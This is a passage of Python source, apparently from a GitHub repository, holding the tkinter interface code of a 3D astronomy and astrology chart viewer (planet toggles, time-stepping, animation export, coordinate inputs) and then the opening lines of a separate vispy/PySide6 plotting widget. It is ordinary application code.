filename=f\"{filename}.mp4\"; \r\n\r\n anim.save(filename, writer=video_)\r\n\r\n#=====================\r\n\r\nPAGE_BG1 = \"#134752\"\r\nBUTT_BG = \"#095161\"\r\nPAGE_BG_2=\"#0F5274\"\r\nFONT_BT2 = (\"Segoe UI\", 10, \"bold\")\r\nFONT_TIT = (\"Tahoma\", 10, \"bold\")\r\nCOLOR_TIT = \"#E1E1E1\"\r\nFONT_SYM = (\"Consolas\", 15, \"normal\")\r\nFONT_N = (\"Tahoma\", 10, \"bold\")\r\n\r\nclass GUI_astro3D:\r\n def __init__(self, parent, planets_data, geo_latitude, data, title_=\"Astronomia 3D - Popiel\"):\r\n self.parent = parent\r\n self.parent.title(title_) \r\n self.parent.bind(\"\", self.keypressed)\r\n self.parent.bind(\"\", self.keypressed)\r\n self.parent.bind(\"1\", self.keypressed)\r\n self.parent.bind(\"2\", self.keypressed)\r\n self.parent.bind(\"\", self.keypressed)\r\n self.parent.bind(\"\", self.keypressed)\r\n \r\n self.page_plot = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page_plot.pack(side=\"top\",fill=\"both\",expand=True,anchor=\"sw\",ipadx=0, ipady=0) \r\n\r\n self.page0 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page0.pack(side=\"left\",fill=\"both\",expand=True,anchor=\"nw\",ipadx=0, ipady=0)\r\n self.page1 = Frame(self.page0,bg=PAGE_BG1,borderwidth=0, relief=\"ridge\")\r\n self.page1.pack(side=\"top\",fill=\"both\",expand=True,anchor=\"nw\",ipadx=0, ipady=0,pady=(0,0))\r\n self.page2 = Frame(self.page0,bg=PAGE_BG1,borderwidth=0, relief=\"ridge\") #\r\n self.page2.pack(side=\"bottom\",fill=\"both\",expand=True,anchor=\"nw\",ipadx=0, ipady=0)\r\n\r\n self.page3 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page3.pack(side=\"right\",fill=\"both\",expand=False,anchor=\"ne\",ipadx=0, ipady=0) \r\n self.page4 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n 
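# Layout note: page3, page4 and page5 are packed right to left and are later populated by time_shift_buttons (time-step controls), anim_buttons (animation controls) and geo_buttons (lat/lon inputs) respectively.\r\n            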
self.page4.pack(side=\"right\",fill=\"both\",expand=False,anchor=\"ne\",ipadx=0, ipady=0) \r\n self.page5 = Frame(self.parent,bg=PAGE_BG1,borderwidth=1, relief=\"ridge\")\r\n self.page5.pack(side=\"right\",fill=\"both\",expand=False,anchor=\"ne\",ipadx=0, ipady=0) \r\n\r\n self.chkvars=[]\r\n chkboxes={}\r\n for i, el in enumerate(c.planets):\r\n if el==\"Node_S\":continue\r\n chkvar = IntVar(); chkvar.set(1) \r\n self.chkvars.append(chkvar)\r\n name=el\r\n sym=c.planets[el]\r\n chkboxes[name]=chkvar\r\n font_f = \"Lucida Console\"\r\n font_ = (font_f, 13, \"normal\")\r\n padx_=1\r\n pady_=(2,0)\r\n if \"Node_\" in name:font_= (font_f, 11, \"normal\"); pady_=(3,0);\r\n if name==\"Sun\":padx_=0\r\n id_=Checkbutton(self.page1, text=sym, variable=self.chkvars[i], command = lambda name=name, chkvar=chkvar: self.planets_toggle(name,chkvar))\r\n id_.config(bg=PAGE_BG1, fg=\"#F0F0F0\", offvalue = 0, onvalue=1, font=font_, activebackground=PAGE_BG_2, activeforeground=\"#F0F0F0\", selectcolor=PAGE_BG_2, justify=\"center\", borderwidth=3)\r\n id_.grid(row=0, column=i+2,sticky='nw', padx=padx_, pady=pady_)\r\n\r\n lbl_empt = Label(self.page1, text=\" \", width=2, justify=\"center\", bg=PAGE_BG1, font=(\"Tahoma\", 8, \"bold\"))\r\n lbl_empt.grid(row=0, column=15,sticky=\"nw\", padx=0, pady=(2,0))\r\n\r\n self.chkvar_all = IntVar() ; self.chkvar_all.set(1)\r\n self.chk_all = Checkbutton(self.page1, text=\"All\", variable=self.chkvar_all, command = lambda name=\"All\", chkvar=self.chkvar_all: self.planets_toggle(name,chkvar))\r\n self.chk_all.config(offvalue = 0, onvalue=1, bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\", 8, \"bold\"), activebackground=PAGE_BG_2, activeforeground=\"#F0F0F0\", selectcolor=PAGE_BG_2,justify=\"center\",borderwidth=3)\r\n self.chk_all.grid(row=0, column=1,sticky='nw', padx=(4,4), pady=(3,0))\r\n\r\n sel_col= \"#015E70\" \r\n COL_1 = \"#E3E3E3\"\r\n style_ = ttk.Style()\r\n try:\r\n style_.theme_use(\"new_style\") \r\n except:\r\n style_ = ttk.Style()\r\n configure_ = dict(foreground = COL_1, selectbackground = sel_col,fieldbackground = sel_col,background = sel_col, arrowcolor = COL_1)\r\n style_.theme_create(\"new_style\", parent=\"alt\", settings = {\"TCombobox\":{\"configure\":configure_}} ) \r\n style_.theme_use(\"new_style\") \r\n\r\n self.combo_ = ttk.Combobox(self.page2, width = 24) \r\n self.combo_.grid(row=0, column=1,sticky=\"w\", padx=10, pady=(0,5)) \r\n self.combo_['values'] = (\"Extra off\", \"Planet projection points\", \"Planet meridian\", \"Planet parallel\", \r\n \"Planet prop. 
horizon\", \"All ecliptic points\", \"Zodiac ecliptic points\",\"Zodiac symbols\",\r\n \"Horizon projections off\",\r\n \"Ecliptic scale\", \"Equator scale\", \"Horizon scale\", \"Prime vertical scale\")\r\n self.combo_.set(\"Hide/show\")\r\n self.combo_[\"state\"] = \"readonly\"\r\n \r\n self.combo_.bind('<>',self.combobox_callback) \r\n self.combo_.bind('',self.combobox_callback)\r\n\r\n #SpinBox input range Validation\r\n self.vc = (self.parent.register(self.input_validate), \"%P\", \"%d\", \"%W\")\r\n\r\n self.time_shift_buttons()\r\n self.anim_buttons()\r\n self.geo_buttons()\r\n\r\n self.plot = astro3D(self.parent,self.page_plot, planets_data, geo_latitude, data=data) \r\n\r\n def time_shift_buttons(self): \r\n sel_col= \"#015E70\"\r\n COL=PAGE_BG1\r\n COL_F=\"#F6F6F6\"\r\n FONT_ = (\"Tahoma\", 8, \"bold\")\r\n FONT_2 = (\"Arial\", 9, \"bold\")\r\n COL_1 = \"#F6F6F6\"\r\n\r\n f_args_p={\"side\":\"top\",\"fill\":\"both\",\"expand\":False,\"anchor\":\"nw\"}\r\n\r\n self.fr = Frame(self.page3,bg=PAGE_BG1,borderwidth=0)\r\n\r\n self.f0 = Frame(self.fr,bg=PAGE_BG1,borderwidth=4)\r\n self.f0.pack(side=\"left\",fill=\"both\",expand=False,anchor=\"nw\", padx=0, pady=0) \r\n self.f1 = Frame(self.fr,bg=PAGE_BG1,borderwidth=4, padx=0, pady=0)\r\n self.f1.pack(**f_args_p)\r\n self.f2 = Frame(self.fr,bg=PAGE_BG1,borderwidth=4, padx=0, pady=0)\r\n self.f2.pack(**f_args_p)\r\n\r\n self.rad_var = StringVar(None, \"Days\")\r\n \r\n w=6; indic=0;\r\n ipx=4; ipy=1; py=0;\r\n args={\"width\":w,\"bg\":COL,\"fg\":COL_F,\"font\":FONT_,\"command\":None,\"variable\":self.rad_var,\"indicator\":indic, \"selectcolor\":sel_col}\r\n args_p={\"fill\":None, \"ipadx\":ipx, \"ipady\":ipy, \"pady\":py,\"side\":\"left\",\"anchor\":\"nw\"}\r\n self.rad_h=Radiobutton(self.f1, text = \"Hours\", value=\"Hours\", **args); self.rad_h.pack(**args_p) \r\n self.rad_m=Radiobutton(self.f1, text = \"Minutes\", value=\"Minutes\", **args); self.rad_m.pack(**args_p) \r\n self.rad_s=Radiobutton(self.f1, text = \"Seconds\", value=\"Seconds\", **args); self.rad_s.pack(**args_p)\r\n\r\n self.spbox_var = IntVar()\r\n self.sp = Spinbox(self.f2, from_=1, to=60,increment=1,textvariable=self.spbox_var,bg=sel_col,width=7,fg=COL_1,font=(\"Tahoma\", 11, \"normal\"),justify=\"center\",buttonbackground=COL)\r\n self.sp.pack(side=\"left\",anchor=\"nw\" ,padx=(0,7), pady=(2,0)) \r\n #SpinBox range Validation\r\n self.sp.config(validate =\"key\", validatecommand = self.vc )\r\n\r\n unit=\"Minutes\"\r\n self.spbox_var.set(10)\r\n self.rad_var.set(unit)\r\n\r\n F_arr=(\"Helvetica\", 14, \"bold\")\r\n ipx=4;ipy=0;py=(0,0);px=3;\r\n ipy=0\r\n arr_p={\"fill\":None, \"ipadx\":ipx, \"ipady\":ipy, \"padx\":px, \"pady\":py,\"side\":\"left\",\"anchor\":\"center\"} \r\n self.bt_arrowL = Button(self.f2,text=\"◄\",command=lambda e=None, Δt=None:self.prev_tk(e, Δt),width=4,bg=COL,fg=COL_F,font=FONT_2)\r\n self.bt_arrowR = Button(self.f2,text=\"►\",command=lambda e=None, Δt=None:self.next_tk(e, Δt),width=4,bg=COL,fg=COL_F,font=FONT_2)\r\n self.bt_arrowL.pack(**arr_p)\r\n self.bt_arrowR.pack(**arr_p)\r\n\r\n self.fr.grid(row=0, column=18,sticky=\"w\", padx=10, pady=(0,0),)\r\n self.bt_arrowL.bind(\"\", lambda e=None, Δt=1:self.prev_tk(e, r_click=Δt))\r\n self.bt_arrowR.bind(\"\", lambda e=None, Δt=1:self.next_tk(e, r_click=Δt)) \r\n\r\n self.rad_h.bind(\"\", lambda e=None, s=\"Hours\":self.radio_(e, s))\r\n self.rad_m.bind(\"\", lambda e=None, s=\"Minutes\":self.radio_(e, s))\r\n self.rad_s.bind(\"\", lambda e=None, s=\"Seconds\":self.radio_(e, s))\r\n\r\n def 
anim_buttons(self):\r\n sel_col= \"#015E70\"\r\n COL=PAGE_BG1\r\n COL_F=\"#F6F6F6\"\r\n FONT_ = (\"Tahoma\", 8, \"bold\")\r\n FONT_2 = (\"Arial\", 8, \"bold\")\r\n COL_1 = \"#F6F6F6\"\r\n\r\n self.bt_anim = Button(self.page4,text=\"Animation\",command=self.anim_tk,width=12,bg=COL,fg=COL_F,font=FONT_2)#\r\n self.bt_anim.grid(row=0, column=0, columnspan=2, sticky=\"w\", padx=(11, 8), pady=(3,5),ipady=0) \r\n self.spbox_var_st = IntVar()\r\n self.sp_st = Spinbox(self.page4, from_=1, to=30,increment=1,textvariable=self.spbox_var_st, bg=sel_col,width=4,fg=COL_1,font=(\"Tahoma\", 11, \"normal\"),justify=\"center\",buttonbackground=COL)\r\n self.sp_st.grid(row=1, column=0,sticky=\"w\", padx=(11, 0), pady=(6,5)) \r\n self.spbox_var_st.set(10)\r\n\r\n self.lbl2 = Label(self.page4, text=\"steps\", justify=\"center\", bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\",8, \"bold\"))\r\n self.lbl2.grid(row=1, column=1, sticky=\"w\", padx=(0,0), pady=4)\r\n\r\n #SpinBox range Validation\r\n self.sp_st.config(validate =\"key\", validatecommand = self.vc)\r\n self.bt_anim.bind(\"\", self.anim_back_tk)\r\n\r\n def geo_buttons(self):\r\n sel_col= \"#015E70\"\r\n COL=PAGE_BG1\r\n COL_F=\"#F6F6F6\"\r\n FONT_ = (\"Tahoma\", 8, \"bold\")\r\n FONT_2 = (\"Arial\", 8, \"bold\")\r\n COL_1 = \"#F6F6F6\"\r\n FONT_E = (\"Arial\", 10, \"normal\")\r\n\r\n self.bt_ = Button(self.page5,text=\"New for current time\",command=self.new_,width=21,bg=COL,fg=COL_F,font=FONT_2)#\r\n self.bt_.grid(row=0, column=0, columnspan=4, sticky=\"w\", padx=(10, 8), pady=(3,5),ipady=0) \r\n\r\n self.long_v = StringVar() ; self.lat_v = StringVar() \r\n self.lat_v.set(\"50.07\"); self.long_v.set(\"19.90\")\r\n #self.lat_v.set(\"40.67\") ; self.long_v.set(\"-73.95\")\r\n\r\n self.inp_lat = Entry(self.page5, textvar = self.lat_v, width=6, font = FONT_E, justify=\"center\", bg=sel_col, fg=COL_1, relief=\"sunken\")\r\n self.inp_lat.grid(row=1, column=0, columnspan=1, sticky=\"w\", padx=(10, 0), pady=(7,2),ipady=0) \r\n self.inp_long = Entry(self.page5, textvar = self.long_v, width=7,font = FONT_E, justify=\"center\", bg=sel_col, fg=COL_1, relief=\"sunken\")\r\n self.inp_long.grid(row=1, column=2, columnspan=1, sticky=\"w\", padx=(5, 0), pady=(7,2),ipady=0)\r\n\r\n lbl3 = Label(self.page5, text=\"lat\", justify=\"left\", width=1, bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\",8, \"bold\"))\r\n lbl3.grid(row=1, column=1, sticky=\"w\", padx=(2,0), pady=(7,2))\r\n lbl4 = Label(self.page5, text=\"lon\", justify=\"left\", width=2, bg=PAGE_BG1, fg=\"#F0F0F0\", font=(\"Arial\",8, \"bold\"))\r\n lbl4.grid(row=1, column=3, sticky=\"w\", padx=(0,6), pady=(7,2))\r\n\r\n self.inp_lat.config(validate =\"key\", validatecommand = self.vc)\r\n self.inp_long.config(validate =\"key\", validatecommand = self.vc)\r\n\r\n self.bt_.bind(\"\", self.reset_lat)\r\n\r\n\r\n\r\n def input_validate(self, input_, action, name):\r\n if input_:\r\n if input_==\"-\":\r\n return True\r\n elif input_==\".\" and \"entry\" in name:\r\n return True\r\n elif input_==\".\" and \"entry\" not in name:\r\n return False\r\n if \"entry2\" in name:\r\n try:\r\n input_=float(input_)\r\n if not self.test_float(input_, 2):\r\n return False\r\n return True\r\n except ValueError:\r\n return False\r\n elif \"entry\" in name:\r\n try:\r\n input_=float(input_)\r\n if not self.test_float(input_, 1):\r\n return False\r\n return True\r\n except ValueError:\r\n return False\r\n else: #Spinbox \r\n try:\r\n int(input_)\r\n if len(str(input_))>6:\r\n return False\r\n return True\r\n except ValueError:\r\n return 
False\r\n elif action==\"0\": #validatecommand + backspace\r\n return True\r\n else:\r\n return False\r\n\r\n def test_float(self, f, inp):\r\n s=str(f)\r\n s=s.replace(\"-\",\"\")\r\n if \".\" in s:\r\n arr=s.split(\".\")\r\n if len(arr)>2: \r\n return False #only 1 dot\r\n if len(arr[1])>2: \r\n return False # only 2 decimal digits\r\n\r\n lim = 2 if inp==1 else 3 \r\n if len(arr[0])>lim:\r\n return False\r\n else:\r\n lim2= 90 if inp==1 else 180 \r\n if abs(int(arr[0]))>lim2:\r\n return False\r\n return True \r\n else:\r\n lim = 2 if inp==1 else 3 \r\n if len(s)>lim:\r\n return False\r\n else:\r\n lim2= 90 if inp==1 else 180 \r\n if abs(int(arr[0]))>lim2:\r\n return False\r\n return True\r\n return True\r\n\r\n\r\n def input_validate0(self, input_, action):\r\n if input_:\r\n if input_==\"-\":\r\n return True\r\n\r\n try:\r\n int(input_)\r\n if len(input_)>4:\r\n return False\r\n return True\r\n except ValueError:\r\n return False\r\n elif action==\"0\": #validatecommand + backspace\r\n return True\r\n else:\r\n return False\r\n\r\n def radio_(self, event=None, s=None):\r\n val =self.rad_var.get()\r\n a1('',val , s)\r\n if s==\"Hours\":\r\n self.spbox_var.set(1)\r\n elif s==\"Minutes\":\r\n self.spbox_var.set(10)\r\n elif s==\"Seconds\":\r\n self.spbox_var.set(30)\r\n self.rad_var.set(s)\r\n\r\n def planets_toggle(self,name,id_):\r\n if name!=\"All\":\r\n obj=self.plot.planets_ids[name]\r\n if id_.get()==1:\r\n obj[\"id_pl\"].set_visible(True)\r\n obj[\"id_t\"].set_visible(True)\r\n if name==\"Node_N\":\r\n self.plot.planets_ids[\"Node_S\"][\"id_pl\"].set_visible(True)\r\n self.plot.planets_ids[\"Node_S\"][\"id_t\"].set_visible(True)\r\n elif id_.get()==0:\r\n for el_ in obj:\r\n obj[el_].set_visible(False)\r\n if name==\"Node_N\":\r\n for el_ in self.plot.planets_ids[\"Node_S\"]:\r\n self.plot.planets_ids[\"Node_S\"][el_].set_visible(False)\r\n self.chkvar_all.set(0)\r\n\r\n elif name==\"All\":\r\n if id_.get()==1:\r\n for id__ in self.chkvars:\r\n id__.set(1)\r\n for pl in self.plot.planets_ids:\r\n obj=self.plot.planets_ids[pl]\r\n obj[\"id_pl\"].set_visible(True)\r\n obj[\"id_t\"].set_visible(True)\r\n \r\n elif id_.get()==0:\r\n for id__ in self.chkvars:\r\n id__.set(0)\r\n for pl in self.plot.planets_ids:\r\n obj=self.plot.planets_ids[pl]\r\n for el_ in obj:\r\n obj[el_].set_visible(False)\r\n self.plot.canvas.draw_idle()\r\n\r\n def combobox_callback(self,event):\r\n str_ = self.combo_.get()\r\n if str_==\"Planet projection points\": \r\n for name in c.planets2:\r\n if name in [ \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=self.plot.planets_ids[name][\"id_pl\"].get_visible() \r\n if not isVisible:continue\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n obj[el].set_visible(isVisible)\r\n \r\n elif str_==\"Planet meridian\":\r\n for name in c.planets2:\r\n if name in [ \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_Mer\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet parallel\":\r\n for name in c.planets2:\r\n if name in [\"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_Par\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet prop. 
horizon\":\r\n for name in c.planets2:\r\n if name in [ \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_proj_hor\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet meridian natal\":\r\n for name in c.planets2:\r\n if name in [\"Node_N\", \"Node_S\", \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue\r\n obj[\"id_Mer_nat\"].set_visible(isVisible)\r\n\r\n elif str_==\"Planet prop. horizon natal\":\r\n for name in c.planets2:\r\n if name in [\"Node_N\", \"Node_S\", \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n isVisible=obj[\"id_pl\"].get_visible()\r\n if not isVisible:continue \r\n obj[\"id_proj_hor_nat\"].set_visible(isVisible)\r\n\r\n elif str_==\"Houses ecliptic points\": \r\n self.toggle_houses_p()\r\n\r\n elif str_==\"Zodiac ecliptic points\": \r\n self.toggle_ecl_p()\r\n\r\n elif str_==\"Zodiac symbols\":\r\n self.toggle_ecl_sym()\r\n\r\n elif str_==\"All ecliptic points\":\r\n self.toggle_ecl_p()\r\n self.toggle_ecl_sym()\r\n self.toggle_houses_p()\r\n\r\n elif str_==\"Celestial equator points\":\r\n isVisible=self.plot.armc_id.get_visible() \r\n self.plot.armc_id.set_visible(not isVisible)\r\n\r\n elif str_==\"Asc, MC, ARMC...\":\r\n isVisible=self.plot.asc_id.get_visible()\r\n for id_ in [self.plot.armc_id, self.plot.mc_id, self.plot.asc_id, self.plot.asc_id2, self.plot.poleN_id, self.plot.poleS_id]:\r\n id_.set_visible(not isVisible)\r\n\r\n elif str_==\"Horizon projections off\":\r\n for name in self.plot.planets_ids:\r\n if name in [\"Node_N\", \"Node_S\", \"Asc\", \"MC\"]:continue\r\n obj=self.plot.planets_ids[name]\r\n for el in [\"id_l_ho\", \"id_pt_Hor\"]:\r\n obj[el].set_visible(False)\r\n\r\n\r\n elif str_==\"Ecliptic scale\":\r\n self.plot.toggle_ecliptic_scale()\r\n\r\n elif str_==\"Equator scale\":\r\n self.plot.toggle_equator_scale()\r\n\r\n elif str_==\"Horizon scale\":\r\n self.plot.toggle_horizon_scale()\r\n\r\n elif str_==\"Prime vertical scale\":\r\n self.plot.toggle_prime_vert_scale()\r\n\r\n elif str_==\"Extra off\":\r\n self.plot.extra_off()\r\n\r\n self.plot.canvas.draw_idle()\r\n\r\n\r\n def toggle_houses_p(self):\r\n isVisible=self.plot.houses_ids[1][\"dot\"].get_visible()\r\n for i in range(1,13):\r\n self.plot.houses_ids[i][\"dot\"].set_visible(not isVisible)\r\n\r\n def toggle_ecl_p(self):\r\n isVisible=self.plot.zodiac_ids[1][\"dot\"].get_visible()\r\n for i in range(1,13):\r\n self.plot.zodiac_ids[i][\"dot\"].set_visible(not isVisible)\r\n\r\n def toggle_ecl_sym(self):\r\n isVisible=self.plot.zodiac_ids[1][\"text\"].get_visible()\r\n for i in range(1,13):\r\n self.plot.zodiac_ids[i][\"text\"].set_visible(not isVisible)\r\n\r\n def prev_tk(self, event, r_click=None):\r\n Δt = self.spbox_var.get()\r\n val = self.rad_var.get()\r\n if r_click!=None:\r\n Δt=r_click\r\n if val ==\"Seconds\":\r\n self.plot.plot_next_prev(seconds=-Δt)\r\n elif val ==\"Minutes\":\r\n self.plot.plot_next_prev(minutes=-Δt)\r\n elif val ==\"Hours\":\r\n self.plot.plot_next_prev(hours=-Δt)\r\n\r\n def next_tk(self, event, r_click=None):\r\n Δt = self.spbox_var.get()\r\n val = self.rad_var.get()\r\n if r_click!=None:\r\n Δt=r_click\r\n if val ==\"Seconds\":\r\n self.plot.plot_next_prev(seconds=Δt)\r\n elif val ==\"Minutes\":\r\n self.plot.plot_next_prev(minutes=Δt)\r\n elif val ==\"Hours\":\r\n self.plot.plot_next_prev(hours=Δt)\r\n\r\n def anim_tk(self):\r\n s=0; m=0; h=0\r\n 
Δt=self.spbox_var.get()\r\n val=self.rad_var.get()\r\n if val==\"Seconds\":\r\n s=Δt\r\n elif val==\"Minutes\":\r\n m=Δt\r\n elif val==\"Hours\":\r\n h=Δt\r\n steps=self.spbox_var_st.get()\r\n for i in range(steps):\r\n self.parent.after(i*300, lambda s=s, m=m, h=h: self.plot.plot_next_prev(seconds=s, minutes=m, hours=h))\r\n self.plot.canvas.draw_idle() \r\n return\r\n \r\n def anim_back_tk(self, event):\r\n s=0; m=0; h=0\r\n Δt=self.spbox_var.get()\r\n val=self.rad_var.get()\r\n Δt=-Δt\r\n if val==\"Seconds\":\r\n s=Δt\r\n elif val==\"Minutes\":\r\n m=Δt\r\n elif val==\"Hours\":\r\n h=Δt\r\n steps=self.spbox_var_st.get()\r\n for i in range(steps):\r\n self.parent.after(i*300, lambda s=s, m=m, h=h: self.plot.plot_next_prev(seconds=s, minutes=m, hours=h))\r\n self.plot.canvas.draw_idle() \r\n return\r\n\r\n def reset_lat(self, time_):\r\n self.lat_v.set(\"0\")\r\n self.long_v.set(\"0\")\r\n\r\n def new_(self):\r\n Δt=self.spbox_var.get()\r\n lat_ = self.lat_v.get()\r\n lon_ = self.long_v.get()\r\n if lat_==\"\" or lon_==\"\":return\r\n lat_ = float(lat_)\r\n lon_ = float(lon_)\r\n if abs(lat_)>90 or abs(lon_)>180:\r\n messagebox.showwarning(\"Wrong value\", \"Values must be within intervals:\\nlatitude:\\n[0, 90] for North and [0, -90] for South\\nlongitude:\\n[0, 180] for East and [0, -180] for West\")\r\n return\r\n self.plot.extra_off()\r\n\r\n tz_=None\r\n t_obj = get_time_now(tz_=tz_)\r\n date_utc=t_obj[\"date_utc\"]\r\n time_utc=t_obj[\"time_utc\"]\r\n dataNow={'n': 'Planets', 'ln': 'positions'}\r\n dataNow[\"d_utc\"]=date_utc\r\n dataNow[\"t_utc\"]=time_utc\r\n dataNow[\"timestamp\"]=t_obj[\"timestamp\"]\r\n dataNow[\"lat\"]=lat_\r\n dataNow[\"lon\"]=lon_\r\n dataNow[\"tz\"]=tz_\r\n dataNow[\"date_loc\"]=t_obj[\"date_loc\"]\r\n dataNow[\"time_loc\"]=t_obj[\"time_loc\"]\r\n planets_data = calc_.get_planets_data(date_utc,time_utc,lat_,lon_,trueNode=True)\r\n self.plot.new_now(planets_data, lat_, data=dataNow)\r\n\r\n\r\n def keypressed(self,event):\r\n if event.keysym==\"F1\":\r\n self.prev_tk(event)\r\n elif event.keysym==\"F2\":\r\n self.next_tk(event)\r\n elif event.keysym==\"1\":\r\n self.prev_tk(event)\r\n elif event.keysym==\"2\":\r\n self.next_tk(event)\r\n elif (event.state==12 and event.keysym==\"a\") or (event.state==12 and event.keysym==\"d\"): # 12=ctrl\r\n time_obj={\"minutes\":10}\r\n frames=self.spbox_var_st.get()\r\n Δt=self.spbox_var.get()\r\n val=self.rad_var.get()\r\n if val==\"Hours\":\r\n time_obj={\"hours\":Δt}\r\n elif val==\"Minutes\":\r\n time_obj={\"minutes\":Δt}\r\n if event.keysym==\"a\":\r\n time_obj.update({\"format\":\"gif\"})\r\n elif event.keysym==\"d\":\r\n time_obj.update({\"format\":\"mp4\"})\r\n self.plot.save_animation(frames=frames, **time_obj)\r\n\r\n\r\n def close_dialog(self):\r\n self.parent.wm_attributes(\"-disabled\", False)\r\n self.parent.deiconify() \r\n self.parent.destroy()\r\n\r\n def Exit(self):\r\n self.parent.destroy() \r\n\r\n\r\n\r\ndef draw_chart3D_now(data=None):\r\n if data==None:\r\n latitude = 40.673\r\n longitude=-73.945\r\n tz_ = \"America/New_York\"\r\n date_=get_time_now(seconds=None) \r\n date_utc = date_[\"date_utc\"]\r\n time_utc = date_[\"time_utc\"]\r\n dataNow={'n': 'Planets', 'ln': 'positions'}\r\n dataNow[\"d_utc\"]=date_[\"date_utc\"]\r\n dataNow[\"t_utc\"]=date_[\"time_utc\"]\r\n dataNow[\"timestamp\"]=date_[\"timestamp\"]\r\n dataNow[\"lat\"]=latitude\r\n dataNow[\"lon\"]=longitude\r\n dataNow[\"tz\"]=tz_\r\n d= date_[\"date_loc\"].split(\"-\")\r\n d=list(reversed(d))\r\n dataNow[\"d\"]=d \r\n t= 
date_[\"time_loc\"].split(\":\") \r\n dataNow[\"t\"]=t\r\n trueNode=True\r\n geo_latitude=latitude\r\n planets_data = calc_.get_planets_data(date_utc,time_utc,latitude,longitude,trueNode=trueNode)\r\n ε=calc_.ε\r\n dataNow[\"obliquity\"]=ε \r\n dataNow[\"trueNode\"]=trueNode\r\n else:\r\n date_utc = data[\"d_utc\"]\r\n time_utc = data[\"t_utc\"]\r\n timestamp = data[\"timestamp\"]\r\n latitude = float(data[\"lat\"])\r\n longitude = float(data[\"lon\"])\r\n geo_latitude=latitude\r\n trueNode=data[\"trueNode\"]\r\n planets_data = calc_.get_planets_data(date_utc,time_utc,latitude,longitude,trueNode=trueNode)\r\n dataNow=data\r\n GUI = GUI_astro3D(root, planets_data, geo_latitude, data=dataNow)\r\n return GUI\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n trueNode=True\r\n #print('sys.argv',len(sys.argv),'\\n',sys.argv);\r\n if len(sys.argv)>1:\r\n if len(sys.argv)>2 and sys.argv[2]==\"standalone\": #standalone command line\r\n data=eval(sys.argv[1])\r\n cmd_obj={\"date_utc\":data[\"d_utc\"], \"time_utc\": data[\"t_utc\"], \"lat\" : data[\"lat\"], \"lon\": data[\"lon\"],\"data\":data, \"trueNode\" : data[\"trueNode\"],\"timestamp\":data[\"timestamp\"]}\r\n else:\r\n json_object=sys.argv[1]\r\n cmd_obj= json.loads(json_object) \r\n\r\n date_utc=cmd_obj[\"date_utc\"]\r\n time_utc=cmd_obj[\"time_utc\"]\r\n latitude=float(cmd_obj[\"lat\"])\r\n longitude=float(cmd_obj[\"lon\"])\r\n trueNode=cmd_obj[\"trueNode\"] \r\n data=cmd_obj[\"data\"] \r\n print(\"command line\") \r\n else:\r\n data=None \r\n\r\n root = Tk()\r\n calc_=calc_for_3D()\r\n GUI = draw_chart3D_now(data)\r\n #keyboard.add_hotkey('esc', GUI.Exit)\r\n mainloop()\r\n\r\n\r\n","repo_name":"Drozdman-1/Astronomia3D","sub_path":"astronomia3D.pyw","file_name":"astronomia3D.pyw","file_ext":"pyw","file_size_in_byte":121480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"31367333581","text":"from vispy import app, scene\r\nimport numpy as np\r\nimport math\r\nfrom collections import deque\r\n\r\nfrom PySide6.QtCore import Qt, Slot, QSize\r\nfrom PySide6.QtGui import QPainter, QFont, QScreen\r\nfrom PySide6.QtWidgets import QWidget, QFrame, QVBoxLayout, QPushButton\r\n# from PySide6.QtOpenGLWidgets import QOpenGLWidget\r\nfrom PySide6.QtUiTools import QUiLoader\r\nfrom PySide6.QtWidgets import QApplication\r\nfrom PySide6.QtDesigner import QPyDesignerCustomWidgetCollection\r\n\r\nclass MyPlotLabel(QWidget):\r\n def __init__(self, p_label, parent =None):\r\n super().__init__(parent)\r\n self.p_label = p_label\r\n \r\n def paintEvent(self, event):\r\n painter = QPainter(self)\r\n \r\n # cur_viewport = painter.viewport()\r\n # painter.setViewport(0,0,35,cur_viewport.height())\r\n\r\n # color = QColor(222, 0, 0)\r\n # painter.fillRect(painter.viewport(), color)\r\n\r\n # color = QColor(0, 0, 0)\r\n # color.setNamedColor('#d4d4d4')\r\n # painter.setPen(color)\r\n # painter.setBrush(QColor(0, 200, 0))\r\n # painter.drawRoundedRect(0, 0, 35, painter.viewport().height(), 5, 5)\r\n\r\n # clip = QRect(2, 2, painter.viewport().width() - 4, painter.viewport().height() - 4);\r\n \r\n painter.setPen(Qt.white)\r\n # painter.translate(10, 55)\r\n painter.translate(painter.viewport().width() - 4, painter.viewport().height() - 4)\r\n painter.rotate(-90)\r\n # painter.drawText(clip, self.p_label)\r\n bold = QFont();\r\n bold.setBold(True);\r\n painter.setFont(bold);\r\n painter.drawText(0, 0, self.p_label.upper())\r\n painter.end()\r\n\r\n# class PlotWidget(QOpenGLWidget):\r\nclass PlotWidget(QWidget):\r\n def __init__(self, controller, comp_name, odr, time_window, n_curves=1, parent=None, p_id = 0):\r\n super().__init__(parent)\r\n self.parent = parent\r\n self.controller = 